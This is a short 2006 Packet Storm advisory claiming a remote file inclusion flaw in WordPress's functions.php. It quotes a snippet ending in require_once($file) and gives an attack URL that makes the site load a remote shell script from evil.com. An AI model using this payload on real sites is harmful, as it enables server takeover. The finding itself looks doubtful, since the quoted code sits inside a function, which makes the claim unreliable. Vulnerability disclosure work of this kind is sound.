wordpress-rfi.txt

2006-11-14T00:00:00
ID PACKETSTORM:51997
Type packetstorm
Reporter _ANtrAX_
Modified 2006-11-14T00:00:00

Description

                                        
                                            `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
WordPress Remote File Inclusion  
Download:http://wordpress.org/latest.zip  
Found by _ANtrAX_ http://foro.c-group.org  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Vulnerable Code:   
{  
global $posts, $post, $wp_did_header, $wp_did_template_redirect, $wp_query,  
  
$wp_rewrite, $wpdb;  
  
  
extract($wp_query->query_vars);  
  
  
require_once($file);  
}  
.....  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Affected File:  
/wp-includes/functions.php =]  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Vulnerability:  
www.site.com/wp-includes/functions.php?file=http://evil.com/shell.txt?  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Greetz:V4MP1R3Z4, FRE4K , PENNISSMEN ,EL GROXO , DEYABU ROOLZ , MATASANOS,C-GROUP STAFF . CHAPINHACK, SysRoot ¬¬  
`